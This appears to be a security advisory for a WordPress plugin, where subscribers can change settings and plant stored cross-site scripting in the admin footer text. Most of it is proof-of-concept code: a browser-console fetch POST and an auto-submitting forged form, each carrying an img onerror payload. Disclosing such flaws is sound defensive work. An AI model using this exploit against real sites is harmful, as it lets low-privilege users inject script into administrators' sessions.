The plugin does not prevent low privilege users from modifying the plugin’s settings. This could allow users such as subscribers to perform Stored Cross-Site Scripting attacks against other users, like administrators, due to the lack of sanitisation and escaping as well.
Run the below command in the developer console of the web browser while being on the blog as a subscriber user
await fetch("/wp-admin/", {
"credentials": "include",
"body": "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=<img src=x onerror=alert(1)>&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern",
"method": "POST",
"mode": "cors"
});
<form id="test" action="https://example.com/wp-admin/" method="post">
<input type="text" name="wpbiz-nonce" value="aaa">
<input type="text" name="tabid" value="total-hacks-admin">
<input type="text" name="wfb_favicon" value="">
<input type="text" name="wfb_admin_favicon" value="">
<input type="text" name="wfb_apple_icon" value="">
<input type="text" name="wfb_remove_xmlrpc" value="">
<input type="text" name="wfb_hide_version" value="">
<input type="text" name="wfb_remove_more" value="">
<input type="text" name="wfb_remove_excerpt" value="">
<input type="text" name="wfb_disallow_pingback" value="">
<input type="text" name="wfb_google_analytics" value="wwwww">
<input type="text" name="wfb_google" value="ttttt">
<input type="text" name="wfb_bing" value="">
<input type="text" name="wfb_revision" value="">
<input type="text" name="wfb_selfping" value="">
<input type="text" name="wfb_pageexcerpt" value="">
<input type="text" name="wfb_createpagefordraft" value="">
<input type="text" name="wfb_custom_logo" value="">
<input type="text" name="wfb_admin_footer_text" value="<img src=x onerror=alert(1)>">
<input type="text" name="wfb_login_logo" value="">
<input type="text" name="wfb_login_url" value="">
<input type="text" name="wfb_login_title" value="">
<input type="text" name="wfb_shortcode" value="">
<input type="text" name="wfb_oembed" value="">
<input type="text" name="wfb_webmaster" value="">
<input type="text" name="wfb_sendername" value="">
<input type="text" name="wfb_emailaddress" value="">
<input type="text" name="wfb_update_notification" value="">
</form>
<script>
document.getElementById("test").submit();
</script>